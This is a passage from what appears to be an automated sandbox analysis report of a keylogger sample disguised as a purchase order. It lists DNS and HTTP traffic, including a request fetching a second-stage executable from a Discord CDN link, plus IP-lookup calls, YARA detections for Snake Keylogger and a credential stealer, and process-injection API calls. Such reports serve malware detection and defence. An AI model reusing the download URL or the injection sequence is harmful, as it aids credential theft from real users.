May 11, 2021 14:33:20.250871897 CEST	53	61721	8.8.8.8	192.168.2.4
May 11, 2021 14:33:21.905344963 CEST	51255	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:21.962615967 CEST	53	51255	8.8.8.8	192.168.2.4
May 11, 2021 14:33:22.856137037 CEST	61522	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:22.918569088 CEST	53	61522	8.8.8.8	192.168.2.4
May 11, 2021 14:33:22.989145041 CEST	52337	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:23.074568987 CEST	53	52337	8.8.8.8	192.168.2.4
May 11, 2021 14:33:24.134169102 CEST	55046	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:24.182914019 CEST	53	55046	8.8.8.8	192.168.2.4
May 11, 2021 14:33:25.260350943 CEST	49612	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:25.309623957 CEST	53	49612	8.8.8.8	192.168.2.4
May 11, 2021 14:33:26.381095886 CEST	49285	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:26.429853916 CEST	53	49285	8.8.8.8	192.168.2.4
May 11, 2021 14:33:37.533327103 CEST	50601	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:37.600411892 CEST	53	50601	8.8.8.8	192.168.2.4
May 11, 2021 14:33:41.574423075 CEST	60875	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:41.636775017 CEST	53	60875	8.8.8.8	192.168.2.4
May 11, 2021 14:33:53.590962887 CEST	56448	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:53.909723997 CEST	53	56448	8.8.8.8	192.168.2.4
May 11, 2021 14:33:54.415513992 CEST	59172	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:54.476701021 CEST	53	59172	8.8.8.8	192.168.2.4
May 11, 2021 14:33:54.907994032 CEST	62420	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:54.980159044 CEST	53	62420	8.8.8.8	192.168.2.4
May 11, 2021 14:33:55.045938015 CEST	60579	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:55.183370113 CEST	53	60579	8.8.8.8	192.168.2.4
May 11, 2021 14:33:55.595793962 CEST	50183	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:55.647414923 CEST	53	50183	8.8.8.8	192.168.2.4
May 11, 2021 14:33:56.331856966 CEST	61531	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:56.388983965 CEST	53	61531	8.8.8.8	192.168.2.4
May 11, 2021 14:33:56.936626911 CEST	49228	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:56.994962931 CEST	53	49228	8.8.8.8	192.168.2.4
May 11, 2021 14:33:57.494411945 CEST	59794	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:57.543504953 CEST	53	59794	8.8.8.8	192.168.2.4
May 11, 2021 14:33:58.278851032 CEST	55916	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:58.337567091 CEST	53	55916	8.8.8.8	192.168.2.4
May 11, 2021 14:33:59.199105024 CEST	52752	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:59.250767946 CEST	53	52752	8.8.8.8	192.168.2.4
May 11, 2021 14:33:59.857441902 CEST	60542	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:59.917814016 CEST	53	60542	8.8.8.8	192.168.2.4
May 11, 2021 14:34:02.505414963 CEST	60689	53	192.168.2.4	8.8.8.8
May 11, 2021 14:34:02.564614058 CEST	53	60689	8.8.8.8	192.168.2.4
May 11, 2021 14:34:12.759620905 CEST	64206	53	192.168.2.4	8.8.8.8
May 11, 2021 14:34:12.834079981 CEST	53	64206	8.8.8.8	192.168.2.4
May 11, 2021 14:34:12.877616882 CEST	50904	53	192.168.2.4	8.8.8.8
May 11, 2021 14:34:12.952399969 CEST	53	50904	8.8.8.8	192.168.2.4
May 11, 2021 14:34:15.913830996 CEST	57525	53	192.168.2.4	8.8.8.8
May 11, 2021 14:34:15.965399027 CEST	53	57525	8.8.8.8	192.168.2.4
May 11, 2021 14:34:47.144423962 CEST	53814	53	192.168.2.4	8.8.8.8
May 11, 2021 14:34:47.212503910 CEST	53	53814	8.8.8.8	192.168.2.4
May 11, 2021 14:34:48.964740992 CEST	53418	53	192.168.2.4	8.8.8.8
May 11, 2021 14:34:49.021850109 CEST	53	53418	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 11, 2021 14:33:15.028887987 CEST	192.168.2.4	8.8.8.8	0xe8e5	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.546327114 CEST	192.168.2.4	8.8.8.8	0x15d6	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.132951975 CEST	192.168.2.4	8.8.8.8	0x9765	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.201937914 CEST	192.168.2.4	8.8.8.8	0x8118	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
May 11, 2021 14:33:22.856137037 CEST	192.168.2.4	8.8.8.8	0xf3f7	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 11, 2021 14:33:15.090392113 CEST	8.8.8.8	192.168.2.4	0xe8e5	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.090392113 CEST	8.8.8.8	192.168.2.4	0xe8e5	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.090392113 CEST	8.8.8.8	192.168.2.4	0xe8e5	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.090392113 CEST	8.8.8.8	192.168.2.4	0xe8e5	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.090392113 CEST	8.8.8.8	192.168.2.4	0xe8e5	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.603993893 CEST	8.8.8.8	192.168.2.4	0x15d6	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.603993893 CEST	8.8.8.8	192.168.2.4	0x15d6	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.603993893 CEST	8.8.8.8	192.168.2.4	0x15d6	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.603993893 CEST	8.8.8.8	192.168.2.4	0x15d6	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:15.603993893 CEST	8.8.8.8	192.168.2.4	0x15d6	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.184025049 CEST	8.8.8.8	192.168.2.4	0x9765	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 14:33:20.184025049 CEST	8.8.8.8	192.168.2.4	0x9765	No error (0)	checkip.dyndns.com		162.88.193.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.184025049 CEST	8.8.8.8	192.168.2.4	0x9765	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.184025049 CEST	8.8.8.8	192.168.2.4	0x9765	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.184025049 CEST	8.8.8.8	192.168.2.4	0x9765	No error (0)	checkip.dyndns.com		131.186.113.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.184025049 CEST	8.8.8.8	192.168.2.4	0x9765	No error (0)	checkip.dyndns.com		131.186.161.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.250871897 CEST	8.8.8.8	192.168.2.4	0x8118	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
May 11, 2021 14:33:20.250871897 CEST	8.8.8.8	192.168.2.4	0x8118	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.250871897 CEST	8.8.8.8	192.168.2.4	0x8118	No error (0)	checkip.dyndns.com		131.186.113.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.250871897 CEST	8.8.8.8	192.168.2.4	0x8118	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.250871897 CEST	8.8.8.8	192.168.2.4	0x8118	No error (0)	checkip.dyndns.com		162.88.193.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:20.250871897 CEST	8.8.8.8	192.168.2.4	0x8118	No error (0)	checkip.dyndns.com		131.186.161.70	A (IP address)	IN (0x0001)
May 11, 2021 14:33:22.918569088 CEST	8.8.8.8	192.168.2.4	0xf3f7	No error (0)	freegeoip.app		172.67.188.154	A (IP address)	IN (0x0001)
May 11, 2021 14:33:22.918569088 CEST	8.8.8.8	192.168.2.4	0xf3f7	No error (0)	freegeoip.app		104.21.19.200	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49737	162.159.135.233	80	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Timestamp	kBytes transferred	Direction	Data
May 11, 2021 14:33:15.647454023 CEST	1211	OUT	GET /attachments/809311531652087809/839820005927550996/Youngest_Snake.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
May 11, 2021 14:33:15.696947098 CEST	1213	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 11 May 2021 12:33:15 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 11 May 2021 13:33:15 GMT Location: https://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe cf-request-id: 09fd03e1a000004e197f226000000001 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B7Zi76q2fXwc5DHOF%2FQcdtxg6gUF7BsBys79abmaDLJH10PNQvwGw5Z0vzTnuWKnwNwdJEVyq0FjCMS3s5Jo%2BqrYmP%2BIxD1Wt1eXHWhqJNCBAHk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 64db6f4908644e19-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49743	162.88.193.70	80	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Timestamp	kBytes transferred	Direction	Data
May 11, 2021 14:33:20.465671062 CEST	1701	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 11, 2021 14:33:20.600750923 CEST	1702	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49744	162.88.193.70	80	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Timestamp	kBytes transferred	Direction	Data
May 11, 2021 14:33:20.905541897 CEST	1702	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 11, 2021 14:33:21.040005922 CEST	1702	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.78</body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 11, 2021 14:33:15.240061998 CEST	162.159.135.233	443	192.168.2.4	49736	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:46:39 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
May 11, 2021 14:33:15.240061998 CEST	162.159.135.233	443	192.168.2.4	49736	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:46:39 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad
May 11, 2021 14:33:23.097259045 CEST	172.67.188.154	443	192.168.2.4	49746	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
May 11, 2021 14:33:23.097259045 CEST	172.67.188.154	443	192.168.2.4	49746	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PURCHASE ORDER E3007921.EXE PID: 6848 Parent PID: 5936

General

Start time:	14:33:13
Start date:	11/05/2021
Path:	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE'
Imagebase:	0x450000
File size:	31744 bytes
MD5 hash:	DAC3AC141A3E0ABB27839284A1DF864C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000000.00000002.661938315.00000000028FD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: PURCHASE ORDER E3007921.EXE PID: 7024 Parent PID: 6848

General

Start time:	14:33:15
Start date:	11/05/2021
Path:	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE
Imagebase:	0x4f0000
File size:	31744 bytes
MD5 hash:	DAC3AC141A3E0ABB27839284A1DF864C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PURCHASE ORDER E3007921.EXE PID: 6848 Parent PID: 5936 PURCHASE ORDER E3007921.EXECOMMON

Executed Functions

Function 00BF2148, Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bff246227c1968c65b2812d359b48aa492d21b4d5ddfae9cd4b3fcde8bc3ca
Instruction ID: 67eaed431f308394e8f5ff7df8af582bc4f0fd6d45c4382f78d3f15098671db0
Opcode Fuzzy Hash: 51bff246227c1968c65b2812d359b48aa492d21b4d5ddfae9cd4b3fcde8bc3ca
Instruction Fuzzy Hash: 0162BE75E012288FEB64DF65C885BEDB7B2AF89304F1485E9D60CA7291DB345E88CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BF2D35, Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BF2F1F

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 59b10fd783ff15df72b4ea11974a7e9a4c8b9d2ba08dd89cd299b328fcbd93ee
Instruction ID: 7c6dfda43bee513f6468b27755022c762cd34f1e21d2f3398c7e386254b9c55a
Opcode Fuzzy Hash: 59b10fd783ff15df72b4ea11974a7e9a4c8b9d2ba08dd89cd299b328fcbd93ee
Instruction Fuzzy Hash: C181D275D0426D8FCB25CF64C880BEEBBF1AB59304F0190EAE649B7250D7749A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BF2D40, Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BF2F1F

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eb3b00c1b495dedd2022ecb2ddbb7f85b33e70142bb6dfa055b69a48fd2ee3ee
Instruction ID: 6c500c2c4edf0ffa695119c38d3ceec3318e27d4875262db4615739ab2ce89fb
Opcode Fuzzy Hash: eb3b00c1b495dedd2022ecb2ddbb7f85b33e70142bb6dfa055b69a48fd2ee3ee
Instruction Fuzzy Hash: CB81C175D0426D8FCB25CF64C880BEEBBF1AB59304F0190EAE649B7250DB749A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BF33A0, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BF3476

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1d8be359ee95bb3cf47a7ad518247e87ef8a4e72ea9dda2412718047f1109a13
Instruction ID: e5e71763f1be17762388c141f24d8e40df08c05c372ed5670e528981a03d8eed
Opcode Fuzzy Hash: 1d8be359ee95bb3cf47a7ad518247e87ef8a4e72ea9dda2412718047f1109a13
Instruction Fuzzy Hash: 73418CB5D042589FCB10CFA9D984AEEFBF1BB49310F24906AE918B7310D374AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00BF33A8, Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BF3476

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13554837c8bf0fa49fbbb4071e52d63f15ff97c2b55da2b5930f3b1e35b23651
Instruction ID: c2e2d707e2790b635f6ac7f08bd8067b4abc3b92f94c3930c3ce4a748c7ca5ea
Opcode Fuzzy Hash: 13554837c8bf0fa49fbbb4071e52d63f15ff97c2b55da2b5930f3b1e35b23651
Instruction Fuzzy Hash: 7A418AB5D042589FCB00CFA9D984AEEFBF1BB09310F24906AE918B7310D374AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00BF3183, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BF3235

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bb8f7a8b10539a1637fc108c9d80eeab3b6149e681d324f0b32f9a79c71a0708
Instruction ID: c918aaf5a99ee95a42efea396aac4b0131cba675245ef0e75beea1c37bd2d862
Opcode Fuzzy Hash: bb8f7a8b10539a1637fc108c9d80eeab3b6149e681d324f0b32f9a79c71a0708
Instruction Fuzzy Hash: 433177B9D042589FCF10CFA9D984ADEFBF5BB19310F14906AE914B7210D335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00BF3188, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BF3235

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 499207bbb6100ce48303f328266725eb400c5e997d0ff69f94c630f386315c54
Instruction ID: d136500204e847619de43e0428b3ee0cbc347f7b6cac15f810f2202e25255895
Opcode Fuzzy Hash: 499207bbb6100ce48303f328266725eb400c5e997d0ff69f94c630f386315c54
Instruction Fuzzy Hash: C53176B9D042589FCF10CFAAD984AEEFBF5BB19310F10906AE914B7210D335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00BF329B, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00BF3345

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 744ba41ce72b2f3e3a8bf91002121cfee021c04cfbf6f53b6f29eea9f1b05b51
Instruction ID: 382ea279395175ab55fdadd586ef3382334bd0ffb479418443e2516ceefdc302
Opcode Fuzzy Hash: 744ba41ce72b2f3e3a8bf91002121cfee021c04cfbf6f53b6f29eea9f1b05b51
Instruction Fuzzy Hash: 553173B9D042589FCB10CFA9D984A9EFBB4AB19310F10A02AE914B7310D335A906CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00BF32A0, Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00BF3345

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 13e54f8e888236cdfd97c9637adee5c1fddb3eab90489f1a57c77f2d5f885313
Instruction ID: 8dffeec35e4b7d296253bb23d855604e3b2172ac1fa561af2d3209a3b23c3179
Opcode Fuzzy Hash: 13e54f8e888236cdfd97c9637adee5c1fddb3eab90489f1a57c77f2d5f885313
Instruction Fuzzy Hash: 923164B9D042589FCF10CFA9D984A9EFBF5BB19310F10A06AE914B7310D335A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00BF3078, Relevance: 1.6, APIs: 1, Instructions: 88threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNEL32(?,?), ref: 00BF3122

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: b6c6be3ca538380909693bc59fbc8141e0396471cabcaeeacc2425ea9504d0ba
Instruction ID: 1085890918cc548a115b681712552f8add2246cddd755c188359bdfc36fc6895
Opcode Fuzzy Hash: b6c6be3ca538380909693bc59fbc8141e0396471cabcaeeacc2425ea9504d0ba
Instruction Fuzzy Hash: 92319BB5D012589FCB10CFA9D984AEEFBF5BB49314F14906AE418B7300D778AA49CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00BF3077, Relevance: 1.6, APIs: 1, Instructions: 88threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNEL32(?,?), ref: 00BF3122

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 20a1a4e0be425b3b49c60b94b2cddf305731201416a9cfd0fa86588cb06ff77e
Instruction ID: 69940734eaf01c96c5522a0fe743551fbc8506a9cf79a3d72ad7cfcc284cbd69
Opcode Fuzzy Hash: 20a1a4e0be425b3b49c60b94b2cddf305731201416a9cfd0fa86588cb06ff77e
Instruction Fuzzy Hash: DA31ACB5D052589FCB10CFA9D884AEEFBF1BB49314F14806AE414B7300D3789A49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BF34E3, Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 00BF355E

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1674e138f0841c367a09d4c7724e919e404dfd76d3aa8fdfb6c70d63c6de3ad0
Instruction ID: c85b6f98f50fdd7c557c7f2c6215a2ab8a970f64a59a531e1ddcc54498d4d2f0
Opcode Fuzzy Hash: 1674e138f0841c367a09d4c7724e919e404dfd76d3aa8fdfb6c70d63c6de3ad0
Instruction Fuzzy Hash: 7A2188B9D042189FCB10CFA9D484AEEFBF4AB59324F14906AE918B7300D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BF34E8, Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 00BF355E

Memory Dump Source

Source File: 00000000.00000002.661577239.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3c6cef92ef78e49a80695e19ef7b418039af534c6dc69338c8b2bb1c3899f299
Instruction ID: 00be89b726a6d25ffa8e0d645a0038b06cc29c645f8410c4f5dee5f150eba370
Opcode Fuzzy Hash: 3c6cef92ef78e49a80695e19ef7b418039af534c6dc69338c8b2bb1c3899f299
